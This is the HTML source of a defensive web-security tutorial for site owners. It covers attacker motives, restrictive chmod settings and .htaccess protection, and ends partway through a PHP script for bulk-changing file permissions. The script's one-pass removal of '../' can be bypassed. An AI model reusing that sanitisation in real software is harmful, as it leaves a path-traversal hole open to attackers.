en-internet-secure-protect-from-hacker-attacks.html

<!DOCTYPE HTML>
<!--
	Twenty by HTML5 UP
	html5up.net | @ajlkn
	Free for personal and commercial use under the CCA 3.0 license (html5up.net/license)
-->
<html lang="en">
<head>
<meta charset="utf-8">
<title>Secure and protect your website from hacker attacks</title>
<link rel="alternate" type="application/rss+xml" href="https://silomia.github.io/rss.xml" title="Silomia">
<link rel="alternate" type="application/rss+xml" href="https://silomia.github.io/en-rss.xml" title="Silomia English">
<link rel="alternate" hreflang="fr" href="https://silomia.github.io/internet-se-proteger-des-pirates-et-hackers.html">
<link rel="alternate" hreflang="en" href="https://silomia.github.io/en-internet-secure-protect-from-hacker-attacks.html">
<link rel="canonical" href="https://silomia.gitlab.io/en-internet-secure-protect-from-hacker-attacks.html">
<link rel="preload" href="css/styles.min.css" as="style">
<link rel="preload" href="js/script.min.js" as="script">
<link rel="preload" href="fonts/silomia-inter-light.woff2" as="font" type="font/woff2" crossorigin="anonymous">
<link rel="preload" href="fonts/silomia-inter-menu.woff2" as="font" type="font/woff2" crossorigin="anonymous">
<link rel="preload" href="fonts/silomia-inter-semibold.woff2" as="font" type="font/woff2" crossorigin="anonymous">
<link rel="preload" href="fonts/silomia-symbol.woff2" as="font" type="font/woff2" crossorigin="anonymous">
<link rel="apple-touch-icon" sizes="192x192" href="favicon-touch-192x192.png">
<link rel="icon" type="image/png" sizes="144x144" href="favicon.png">
<link rel="manifest" href="manifest.json">
<link rel="mask-icon" href="magnolia-silomia-carre.svg" color="#ab2bab">
<meta name="apple-mobile-web-app-title" content="Silomia">
<meta name="application-name" content="Silomia">
<meta name="theme-color" content="#ffffff">
<meta property="og:title" content="Secure and protect your website from hacker attacks">
<meta property="og:locale" content="en">
<meta property="og:site_name" content="Silomia">
<meta property="og:type" content="article">
<meta property="og:image" content="https://silomia.github.io/images/password-pn_photo.jpg">
<meta property="og:url" content="https://silomia.github.io/en-internet-secure-protect-from-hacker-attacks.html">
<meta name="viewport" content="width=device-width initial-scale=1.0 maximum-scale=1.0 user-scalable=no">
<script type="application/ld+json">
	{"@context":"http://schema.org/","@type":"Article","author":{"@type":"Person","name":"Ralph Davidovits"},"publisher":{"@type":"Organization","name":"Silomia","logo":{"@type":"ImageObject","url": "https://silomia.github.io/favicon-touch-192x192.png"}},
	"datePublished":"2021-06-21","dateModified":"2024-07-15",
	"headline":"Secure and protect your website from hacker attacks",
	"image":["https://silomia.github.io/images/up-close-pear-cake.jpg"],
	"mainEntityOfPage":{"@type":"WebPage","@id":"https://silomia.github.io/internet.html"}
	}
</script>
<style media="screen">@media screen and (prefers-color-scheme:dark){body{color:silver;background-color:#151515}}a,article,body,div,em,footer,header,html,img,li,picture,section,span,strong{margin:0;padding:0;border:0}h1,h2,h3,h4,p,ul{padding:0;border:0}article,footer,header,section{display:block}.container{margin-left:auto;margin-right:auto;width:1300px}*,.row,.row>*,::after,::before{box-sizing:border-box}.row{border-bottom:solid 1px transparent;margin:-50px 0-1px -50px}.row>*{float:left;padding:50px 0 0 50px}.row::after,.row::before{content:"";display:block;clear:both;height:0}.\34 u,.\34 u\$,.\36 u,.\38 u{width:33.3333333333%;clear:none;margin-left:0}.\36 u,.\38 u{width:50%}.row.\31 50\%>*{padding:75px 0 0 75px}.row.\31 50\%{margin:-75px 0-1px -75px}.\38 u{width:66.6666666667%}body{font-family:"Inter",-apple-system,system-ui,sans-serif;font-weight:300;letter-spacing:.02em;line-height:1.65em}a{text-decoration:none;border-bottom:dotted 1px}h1,h2,h3,h4,strong{font-weight:600}em{font-style:italic}blockquote,p,ul{margin:0 0 2em}h1,h2,h3,h4{color:inherit;line-height:1.75em;margin:.7em 0;text-transform:uppercase;letter-spacing:normal}h1{font-size:1.4em}h2,h3{font-size:1.15em}blockquote{font-style:italic;padding:1em 0 1em 2em}body,section{font-size:14pt}section.special{text-align:center}header.major{padding-bottom:2em}header.special{margin-bottom:4em;padding-top:5.5em;position:relative;text-align:center}header.special::after,header.special::before{border-bottom:solid 1.5px;border-top:solid 1.5px;content:"";height:7px;opacity:.1;position:absolute;top:1.75em;width:43%}header.special::before{left:0}header.special::after{right:0}header.special h1{margin-bottom:0;font-weight:300}header.special h1+p{margin-bottom:0;padding-top:1.5em}header.special .icon{height:7em;left:0;position:absolute;text-align:center;top:1em;width:100%}header.special .icon::before{font-size:3.5em;opacity:.35}footer>:last-child{margin-bottom:0}picture{min-height:100px}#main{padding:7em 0}body.index #main{padding-top:5em}.mh-head .mh-text{display:block}.mh-head.mh-align-right .mh-text{text-align:right}.image.featured img,picture.image.featured{display:block;margin:0 0 2em;width:100%;min-height:200px}.wrapper{margin-bottom:5em;padding:5em}.wrapper.style3,.wrapper.style4{color:inherit;border-radius:5px}.wrapper.style4{padding:4em}.fa-lg{font-size:1.33333333em;line-height:.75em;vertical-align:-15%}.icon{text-decoration:none;position:relative}.icon::before{font-style:normal;font-weight:400;text-transform:none!important}.mm-menu_offcanvas:not(.mm-menu_opened){display:none}@media screen and (min-width:1900px){.container{width:1400px}body,section{font-size:16pt}}@media screen and (max-width:1680px){.container{width:1200px}.row>*{padding:40px 0 0 40px}.row{margin:-40px 0-1px -40px}.row.\31 50\%>*{padding:60px 0 0 60px}.row.\31 50\%{margin:-60px 0-1px -60px}#main .sidebar section{margin:3em 0 0;padding:3em 0 0}#main .sidebar section:first-child{border-top-width:0;padding-top:0;margin-top:0}body{font-size:14pt}section{font-size:12.5pt}}@media screen and (max-width:1280px){.container{width:960px}.row>*{padding:40px 0 0 40px}.row{margin:-40px 0-1px -40px}.row.\31 50\%>*{padding:60px 0 0 60px}.row.\31 50\%{margin:-60px 0-1px -60px}#main .sidebar section{margin:3em 0 0;padding:3em 0 0}#main .sidebar section:first-child{border-top-width:0;padding-top:0;margin-top:0}body{font-size:13pt;line-height:1.65em}section{font-size:12pt}h1,h2,h3,h4{line-height:1.5em}.wrapper{margin-bottom:4em;padding:4em 3em}.wrapper.style4{padding:3em}}@media screen and (max-width:980px){.container{width:95%}.row>*{padding:30px 0 0 30px}.row{margin:-30px 0-1px -30px}.row.\31 50\%>*{padding:45px 0 0 45px}.row.\31 50\%{margin:-45px 0-1px -45px}body{font-size:13pt;line-height:1.55em}section{font-size:12.5pt}header.special{padding-left:2.5em;padding-right:2.5em}.wrapper{margin-bottom:3em;padding:3em 2.5em}.wrapper.style4{padding:2.5em}}@media screen and (max-width:840px){.container{width:95%!important}.row>*{padding:30px 0 0 30px}.row{margin:-30px 0-1px -30px}.row.\31 50\%>*{padding:45px 0 0 45px}.row.\31 50\%{margin:-45px 0-1px -45px}.\31 2u\28narrower\29 {width:100%;clear:none;margin-left:0}body,html{font-size:14pt}section{font-size:13pt;margin:1em 0}h1{font-size:1.25em;letter-spacing:-.02em}h2,h3{font-size:1.05em;letter-spacing:.002em}header.special{margin-bottom:4em;padding-top:5em}header.special::after,header.special::before{width:40%}header.special h1+p{padding-top:1.25em;letter-spacing:-.01em}section:first-child{margin-top:0}.wrapper.style4{padding-bottom:3em}#main{padding:5em 0}}@media screen and (max-width:730px){.container{width:100%!important}.row>*{padding:30px 0 0 30px}.row{margin:-30px 0-1px -30px}.row.\31 50\%>*{padding:45px 0 0 45px}.row.\31 50\%{margin:-45px 0-1px -45px}body{min-width:320px;font-size:14pt;letter-spacing:.01em}section{font-size:13.5pt}h1{font-size:1.25em}h2,h3{font-size:1em}header,header p{text-align:center}header.special{margin-bottom:3em;padding-left:1.5em;padding-right:1.5em}header.special::after,header.special::before{width:38%}header.special .icon{font-size:.75em;top:1.5em}.image.featured img,picture.image.featured{min-height:100px}.wrapper{margin-bottom:2.5em;padding:2.25em 1.5em}.wrapper.style4{background-size:10em;padding:1.5em 1.5em 3em}#main{padding:3.5em 0 2.5em}}@media screen and (max-width:360px){body{font-size:14pt}section{font-size:13pt}}</style>
</head>

<body class="right-sidebar" onerror="ers()">
<div id="page-wrapper">

<!-- Header -->
<header id="header" role="banner" class="mh-head mh-align-right">
	<span class="mh-btns-left"><a class="mburger mburger--squeeze" href="#my-menu"><b></b> <b></b> <b></b> <span class="mburger-label">Menu</span></a></span>
	<span class="icon fa-magnolia mh-logo"></span>
	<span class="mh-text slogan"><strong>Touch the light</strong> through the path of words</span>
</header>

<!-- Main -->
<article id="main">
	<header class="special container">
		<span class="icon fa-code"></span>
		<h1>Secure and protect your website from <strong>hackers attacks</strong></h1>
		<p>Learn how they do it so you don't get scared and know the parry.</p>
	</header>

	<!-- One -->
	<section class="wrapper style4 container">
		<div class="row 150%">
			<div class="8u 12u(narrower)">

				<!-- Content -->
				<div class="content">
					<section>
						<picture class="image featured">
							<source type="image/avif" media="(max-width: 415px)" srcset="images/password-pn_photo@1x.avif">
							<source type="image/avif" media="(min-width: 416px)" srcset="images/password-pn_photo@1x.avif 1x, images/password-pn_photo.avif 2x">
							<source media="(max-width: 415px)" srcset="images/password-pn_photo@1x.jpg">
							<source media="(min-width: 416px)" srcset="images/password-pn_photo@1x.jpg 1x, images/password-pn_photo.jpg 2x">
							<img src="images/password-pn_photo@1x.jpg" alt="Password. Crédit photo: PN_Photo">
						</picture>
						<header>
							<h2>Table of Contents</h2>
						</header>
						<p>
<table class="smallfont">
<tbody>
<tr>
<td><a href="#intro">Who are the hackers?</a></td>
<td><a href="#chmod">CHMOD permissions</a></td>
<td><a href="#htaccess">Protection by htaccess</a></td>
</tr>
<tr>
<td><a href="#gesfic">File Manager</a></td>
<td><a href="#installsql">Install a blog, cms, wiki</a></td>
<td><a href="#nommage">File naming</a></td>
</tr>
<tr>
<td><a href="#motpasse">Passwords</a></td>
<td><a href="#cryptconfig">Encrypt config.inc.php</a></td>
<td><a href="#cryptmail">Encrypt e-mail address</a></td>
</tr>
<tr>
<td><a href="#adressmail">E-mail addresses to avoid</a></td>
<td><a href="#dossierpasse">Password Lockout</a></td>
<td><a href="#robots">The file robots.txt</a></td>
</tr>
<tr>
<td><a href="#protcss">Protect CSS and index.php</a></td>
<td><a href="#filtrephp">Secure a PHP script</a></td>
<td><a href="#injectsql">Counter SQL injection</a></td>
</tr>
<tr>
<td><a href="#fichmodif">List of modified files</a></td>
<td><a href="#testweb">Test site security</a></td>
<td><a href="#piratesavoir">Hacked without knowing it?</a></td>
<td> </td>
</tr>
</tbody>
</table></p>
						<a id="intro"></a><hr><br>
						<header>
							<h2>Introduction</h2>
						</header>
						<p>How can you prevent your website from being used by a hacker as a platform for phishing or spamming? How to avoid defacing, i.e., deleting your website and replacing it with another one, or a page with an anti-western slogan? How to avoid specific security holes?</p>
						<p>In principle, your provider's mutualized servers should be relatively secure and have tools to block some suspicious behaviours. Hosting providers are professionals who master their equipment. They offer a space that you must control, they do not do it for you. Indeed, they only take care of their part (the management of the hardware and their servers), and you are responsible for the data you put there (website, e-mail, files…). Consequently, the host suspends your website after an attack, leaving you to fix the problem on your own. As long as you do not intervene, this after-the-fact action blocks your account and your website remains inaccessible. It is therefore preferable to prevent the hacker from harming you.</p>
						<p>Here are some very practical and very effective tips. It is the collection of these tips and tricks that will secure your site because there is no single solution; hackers use many different means to force an account.</p>
						<p><strong>Who are the hackers?</strong> The first ones are “skiddy”, young people (“kid” in English, “kiddy” for the little one) who use ready-to-use scripts (the “s” of skiddy) that are easily found on the web to exploit the flaws of a CMS, blog, e-commerce, etc. They just use these scripts as you would use a software. They are not “small geniuses”, they don't code and they don't invent anything. They challenge whoever will delete or violate the most websites. The others, much more dangerous, are hackers at the service of a mafia in order to take control of your website via a flaw in your CMS, blog or e-commerce to convert it into a platform for sending spam or phishing, or as a robot to violate other computers. These people create their own scripts that they do not share with a community. They do this for money; the mafia pays them according to the number of websites hacked, login and password collected, means of payment intercepted, personal computers they have taken control of without the knowledge of the unfortunate owner (i.e., your PC at home) and taking advantage of your Internet connection by coding a <em>malware</em> for example.</p>
						<p><strong>Why are they attacking your site?</strong> Neither the skiddy nor the mobster is targeting you personally. Some do it for fun, some do it for money. It is unlikely you would be personally targeted. Some skiddies erase sites and hide behind pseudo-political and anti-western slogans to scare you, to make them feel important and taken seriously. This is not the case.</p>
						<p><strong>How do they know my site has a security flaw?</strong> Answer: Google or any other search engine! They look for a specific file like login.php, confip.php or others, and, combined with a few keywords, know which CMS, blog or e-commerce you are using. They will then try to run a script to test if the attack works. They don't even do this manually because they have software that does it automatically!!! Their software tests every URL listed by Google looking for the flaw. It is as simple as that. They find you by chance.</p>
						<p>So we are going to try to guard against these automatic attacks. These tips only concern websites using a CMS, blog or e-commerce, etc. coded by computer experts or by you.</p>
						<p><strong class="vert">TIP NUMBER ONE:</strong> your CMS, blog or e-commerce must be up to date. You will follow the security updates and install them without delay.</p>
						<p><strong class="vert">TIP NUMBER 2: THE MOST IMPORTANT RULES</strong> <br>
						As this tutorial is lengthy, here are the rules that should be applied in priority. You can include the others later.<br>
						<strong>1-</strong> Assign chmod 404 permission to files and chmod 505 permission to folders via FTP. <a href="#chmod">See the article below.</a> <strong>This is, without a doubt, the most effective and essential rule.</strong></p>
						<p><strong>2-</strong> The dashboard or the administration interface of your blog, CMS or e-commerce is protected by a login and a complex password. However, its resistance to attack depends on the technical choices (and flaws) of the developer. Against this, add a second protection by <a href="#dossierpasse">.htaccess password.</a> If a hacker manages to bypass the first security, he will come up against a second wall. <strong>This double defence is an armour against automatic attacks.</strong></p>
						<p><strong>3-</strong> htaccess filtering rules. They allow you to stop many attacks before hitting your website. <a href="#htaccess">See the article here.</a> Their effectiveness will be excellent but they are based on <strong>hacker behaviours and techniques that evolve</strong> over the years. These protections will never be absolute.</p>
						<p>If you can combine the first three rules, or at least only the first two, <strong class="vert"> you will build a real fortress!</strong></p>
						<p><strong>4-</strong> Rules for backing up and restoring your website. First, check which files the hacker has added or modified by installing <a href="#fichmodif">this script</a>. Second, are you able to completely erase your website to remove all hacker traces and reactivate everything within 30 minutes? Here's how. <a href="en-internet-backup-restore-files-web-sql.html">Read the article here</a>.</p>
						<a id="chmod"></a><hr><br>
						<header>
							<h2>Write, read and execute permissions.</h2>
						</header>
						<p><strong class="vert">-= ESSENTIAL =-</strong></p>
						<p>Read more here: <a href="https://en.wikipedia.org/wiki/Chmod">Description of the CHMOD and the meaning of the numbers.</a></p>
						<p>Be careful, these rules may work for some hosts and not for others. Give it a try, it is really worth it.</p>
						<p>We are used to saying that we have to assign by FTP the permission 644 to a file and 755 to a folder.<br>
						In fact, some hosts (but not all) don't seem to use <em>group</em>. So we could very well use 604 permission for a file and 705 permission for a folder. If an attacker enters the system with a <em>group</em> permission, he will not have access to anything, neither read nor write.</p>
						<p>We can go further. Let's protect sensitive parts of your CMS, blog or e-commerce, such as the config.php and .htaccess file by giving it 404 (or 444) permission. No one will be able to modify it, not even you (this is absolutely wrong if your site has a big security hole, but it is unstoppable against an automatic attack). You will only be able to do it by FTP when you really need to modify it.</p>
						<p><strong>This is how I protect my site:</strong><br>
						All files have 404 (or 444) permission.<br>
						All folders have 505 (or 555) permission.<br>
						If a file or folder requires writing permission by the server, set 604 for the file and 705 for the folder. No need to do the famous 777 (all rights to everyone) which is a public danger, a provocation to hacking because you announce that your house is wide open, without doors or windows, anyone can help himself.<br>
						The config and htaccess files have 404 (or 444) permission.<br>
						The folder “www” or “public_html” <strong>must</strong> be in chmod 705 or 755 depending on your host, never change it.</p>
						<p><strong>Advantage:</strong> nobody can modify your files. <strong>Disadvantage:</strong> you have to change the write permission (644 and 755) if you update your CMS, blog or e-commerce and give the proper permission 404 (or 444) and 505 (or 555) afterwards. It takes 10 minutes, but it is worth it. If your web host doesn't allow you to do this, move to another one.</p>
						<p><strong>Why is this so important?</strong> The hacker is trying to install a file on your site in order to take control of it (to delete the site, to put files for phishing or a script that sends spam, etc.). He is looking for security holes so that he can save his takeover file on your server. If your website has a security hole, the hacker will exploit it, but since your website only has folders and files that are write-prohibited, he won't be able to save anything. His attack will not work. <strong>If there was only one rule to apply it would be this one, without a doubt the most effective and essential one.</strong></p>
						<p>The easiest way is to use your FTP software, display the information about a file or folder and your software will provide the option to change permission. Another effective method, if you have many files, is to connect using SSH (see its description below). Otherwise, here is a small PHP script that will allow you to perform this operation very simply. You save this file in your web hosting, open it from your browser, enter the path to the folder you want to process, and choose the CHMOD settings for all files and folders included in this directory. A detailed report will give you the results. Once the operation is completed, delete this file to prevent unintended use.</p>
						<p>You can get this PHP file here: <a href="depot/chmod-en.zip">chmod-en.zip (2.1 KB)</a></p>
<span class="smallfont">Code PHP:</span>
<!-- HTML generated using hilite.me --><div class="smallfont code" style="overflow:auto;width:auto;height:40em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%"><span style="color: #BC7A00">&lt;?php</span>
<span style="color: #408080; font-style: italic">/*</span>
<span style="color: #408080; font-style: italic">CHMOD permission MODIFICATION FORM FOR FILES AND FOLDERS</span>
<span style="color: #408080; font-style: italic">Save this file in your web hosting directory, open it </span>
<span style="color: #408080; font-style: italic">with your browser and follow the instructions.</span>
<span style="color: #408080; font-style: italic">An error report is provided. Delete the file after use.</span>
<span style="color: #408080; font-style: italic">*/</span>

<span style="color: #408080; font-style: italic">/* variable initialization */</span>
<span style="color: #19177C">$dosPerm</span> <span style="color: #666666">=</span> <span style="color: #BA2121">&quot;0&quot;</span>;
<span style="color: #19177C">$ficPerm</span> <span style="color: #666666">=</span> <span style="color: #BA2121">&quot;0&quot;</span>;
<span style="color: #19177C">$retval</span> <span style="color: #666666">=</span> <span style="color: #BA2121">&quot;0&quot;</span>; <span style="color: #408080; font-style: italic">/* CHMOD error count */</span>

<span style="color: #408080; font-style: italic">/* Path to the file to be processed */</span>
    <span style="color: #19177C">$chem</span> <span style="color: #666666">=</span> <span style="color: #008000">preg_replace</span>(<span style="color: #BA2121">&#39;~[^_A-Za-z0-9-\.%\/]~i&#39;</span>,<span style="color: #BA2121">&#39;&#39;</span>, <span style="color: #19177C">$_POST</span>[<span style="color: #BA2121">&quot;chemin&quot;</span>]);    <span style="color: #408080; font-style: italic">/* absolute file path (with cleanup against hacking) */</span>
    <span style="color: #19177C">$chem</span> <span style="color: #666666">=</span> <span style="color: #008000">preg_replace</span>(<span style="color: #BA2121">&#39;/\.\.\//&#39;</span>,<span style="color: #BA2121">&#39;&#39;</span>, <span style="color: #19177C">$chem</span>);    <span style="color: #408080; font-style: italic">/* you forbid the command ../ */</span>
    <span style="color: #008000">define</span>(<span style="color: #BA2121">&#39;ABSPATH&#39;</span>, <span style="color: #008000">dirname</span>(<span style="color: #008000; font-weight: bold">__FILE__</span>));
    <span style="color: #19177C">$chem</span> <span style="color: #666666">=</span> ABSPATH<span style="color: #666666">.</span><span style="color: #19177C">$chem</span>;    <span style="color: #408080; font-style: italic">/* absolute file path of your account such as /home/loginftp/www/ or /home/loginftp/public_html/ etc. */</span>

<span style="color: #408080; font-style: italic">/* Folder permission */</span>
    <span style="color: #19177C">$d1</span> <span style="color: #666666">=</span> <span style="color: #008000">filter_var</span>(<span style="color: #19177C">$_POST</span>[<span style="color: #BA2121">&quot;dir1&quot;</span>], FILTER_VALIDATE_REGEXP, <span style="color: #008000; font-weight: bold">array</span>(<span style="color: #BA2121">&#39;options&#39;</span> <span style="color: #666666">=&gt;</span> <span style="color: #008000; font-weight: bold">array</span>(<span style="color: #BA2121">&#39;regexp&#39;</span> <span style="color: #666666">=&gt;</span> <span style="color: #BA2121">&#39;/^[57]$/&#39;</span>)));
    <span style="color: #19177C">$d2</span> <span style="color: #666666">=</span> <span style="color: #008000">filter_var</span>(<span style="color: #19177C">$_POST</span>[<span style="color: #BA2121">&quot;dir2&quot;</span>], FILTER_VALIDATE_REGEXP, <span style="color: #008000; font-weight: bold">array</span>(<span style="color: #BA2121">&#39;options&#39;</span> <span style="color: #666666">=&gt;</span> <span style="color: #008000; font-weight: bold">array</span>(<span style="color: #BA2121">&#39;regexp&#39;</span> <span style="color: #666666">=&gt;</span> <span style="color: #BA2121">&#39;/^[057]$/&#39;</span>)));
    <span style="color: #19177C">$d3</span> <span style="color: #666666">=</span> <span style="color: #008000">filter_var</span>(<span style="color: #19177C">$_POST</span>[<span style="color: #BA2121">&quot;dir3&quot;</span>], FILTER_VALIDATE_REGEXP, <span style="color: #008000; font-weight: bold">array</span>(<span style="color: #BA2121">&#39;options&#39;</span> <span style="color: #666666">=&gt;</span> <span style="color: #008000; font-weight: bold">array</span>(<span style="color: #BA2121">&#39;regexp&#39;</span> <span style="color: #666666">=&gt;</span> <span style="color: #BA2121">&#39;/^[057]$/&#39;</span>)));
    <span style="color: #19177C">$dosPerm</span> <span style="color: #666666">=</span> <span style="color: #BA2121">&quot;0&quot;</span><span style="color: #666666">.</span><span style="color: #19177C">$d1</span><span style="color: #666666">.</span><span style="color: #19177C">$d2</span><span style="color: #666666">.</span><span style="color: #19177C">$d3</span>;
    <span style="color: #19177C">$dosPerm</span> <span style="color: #666666">=</span> <span style="color: #008000">intval</span>(<span style="color: #19177C">$dosPerm</span>,<span style="color: #666666">8</span>);
<span style="color: #408080; font-style: italic">/* File permission */</span>
    <span style="color: #19177C">$f1</span> <span style="color: #666666">=</span> <span style="color: #008000">filter_var</span>(<span style="color: #19177C">$_POST</span>[<span style="color: #BA2121">&quot;fic1&quot;</span>], FILTER_VALIDATE_REGEXP, <span style="color: #008000; font-weight: bold">array</span>(<span style="color: #BA2121">&#39;options&#39;</span> <span style="color: #666666">=&gt;</span> <span style="color: #008000; font-weight: bold">array</span>(<span style="color: #BA2121">&#39;regexp&#39;</span> <span style="color: #666666">=&gt;</span> <span style="color: #BA2121">&#39;/^[46]$/i&#39;</span>)));
    <span style="color: #19177C">$f2</span> <span style="color: #666666">=</span> <span style="color: #008000">filter_var</span>(<span style="color: #19177C">$_POST</span>[<span style="color: #BA2121">&quot;fic2&quot;</span>], FILTER_VALIDATE_REGEXP, <span style="color: #008000; font-weight: bold">array</span>(<span style="color: #BA2121">&#39;options&#39;</span> <span style="color: #666666">=&gt;</span> <span style="color: #008000; font-weight: bold">array</span>(<span style="color: #BA2121">&#39;regexp&#39;</span> <span style="color: #666666">=&gt;</span> <span style="color: #BA2121">&#39;/^[046]$/i&#39;</span>)));
    <span style="color: #19177C">$f3</span> <span style="color: #666666">=</span> <span style="color: #008000">filter_var</span>(<span style="color: #19177C">$_POST</span>[<span style="color: #BA2121">&quot;fic3&quot;</span>], FILTER_VALIDATE_REGEXP, <span style="color: #008000; font-weight: bold">array</span>(<span style="color: #BA2121">&#39;options&#39;</span> <span style="color: #666666">=&gt;</span> <span style="color: #008000; font-weight: bold">array</span>(<span style="color: #BA2121">&#39;regexp&#39;</span> <span style="color: #666666">=&gt;</span> <span style="color: #BA2121">&#39;/^[046]$/i&#39;</span>)));
    <span style="color: #19177C">$ficPerm</span> <span style="color: #666666">=</span> <span style="color: #BA2121">&quot;0&quot;</span><span style="color: #666666">.</span><span style="color: #19177C">$f1</span><span style="color: #666666">.</span><span style="color: #19177C">$f2</span><span style="color: #666666">.</span><span style="color: #19177C">$f3</span>;
    <span style="color: #19177C">$ficPerm</span> <span style="color: #666666">=</span> <span style="color: #008000">intval</span>(<span style="color: #19177C">$ficPerm</span>, <span style="color: #666666">8</span>);

<span style="color: #408080; font-style: italic">/* Html form to change permission */</span>
    <span style="color: #008000; font-weight: bold">print</span> <span style="color: #BA2121">&quot;&lt;html&gt;&lt;meta http-equiv=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">content-type</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121"> content=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">text/html; charset=utf-8</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121"> /&gt;&quot;</span>;
    <span style="color: #008000; font-weight: bold">print</span> <span style="color: #BA2121">&quot;&lt;body&gt;&lt;h3&gt;Changing CHMOD access permission to folders and files &lt;br /&gt;in your hosting.&lt;/h3&gt;&quot;</span>;
    <span style="color: #008000; font-weight: bold">print</span> <span style="color: #BA2121">&quot;&lt;table&gt;&lt;tr&gt;&lt;td&gt;&quot;</span>;
    <span style="color: #008000; font-weight: bold">print</span> <span style="color: #BA2121">&quot;&lt;form method=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">post</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">&gt;&quot;</span>;
    <span style="color: #008000; font-weight: bold">print</span> <span style="color: #BA2121">&quot;&lt;tr&gt;&lt;td&gt;Folder permission: &lt;/td&gt;&quot;</span>;
    <span style="color: #008000; font-weight: bold">print</span> <span style="color: #BA2121">&quot;&lt;td&gt;&lt;select name=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">dir1</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">&gt;&lt;option value=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">5</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">&gt;5&lt;/option&gt;&lt;option value=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">7</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121"> selected&gt;7&lt;/option&gt;&lt;/select&gt;&lt;select name=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">dir2</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">&gt;&lt;option value=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">0</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">&gt;0&lt;/option&gt;&lt;option value=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">5</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121"> selected&gt;5&lt;/option&gt;&lt;option value=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">7</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">&gt;7&lt;/option&gt;&lt;/select&gt;&lt;select name=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">dir3</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">&gt;&lt;option value=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">0</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">&gt;0&lt;/option&gt;&lt;option value=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">5</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121"> selected&gt;5&lt;/option&gt;&lt;option value=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">7</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">&gt;7&lt;/option&gt;&lt;/select&gt;&lt;/td&gt;&lt;/tr&gt;&quot;</span>;
    <span style="color: #008000; font-weight: bold">print</span> <span style="color: #BA2121">&quot;&lt;tr&gt;&lt;td&gt;File permission: &lt;/td&gt;&quot;</span>;
    <span style="color: #008000; font-weight: bold">print</span> <span style="color: #BA2121">&quot;&lt;td&gt;&lt;select name=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">fic1</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">&gt;&lt;option value=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">4</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">&gt;4&lt;/option&gt;&lt;option value=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">6</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121"> selected&gt;6&lt;/option&gt;&lt;/select&gt;&lt;select name=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">fic2</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">&gt;&lt;option value=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">0</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">&gt;0&lt;/option&gt;&lt;option value=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">4</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121"> selected&gt;4&lt;/option&gt;&lt;option value=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">6</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">&gt;6&lt;/option&gt;&lt;/select&gt;&lt;select name=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">fic3</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">&gt;&lt;option value=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">0</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">&gt;0&lt;/option&gt;&lt;option value=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">4</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121"> selected&gt;4&lt;/option&gt;&lt;option value=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">6</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">&gt;6&lt;/option&gt;&lt;/select&gt;&lt;/td&gt;&lt;/tr&gt;&quot;</span>;
    <span style="color: #008000; font-weight: bold">print</span> <span style="color: #BA2121">&quot;&lt;tr&gt;&lt;td&gt;Directory to control: &lt;/td&gt;&quot;</span>;
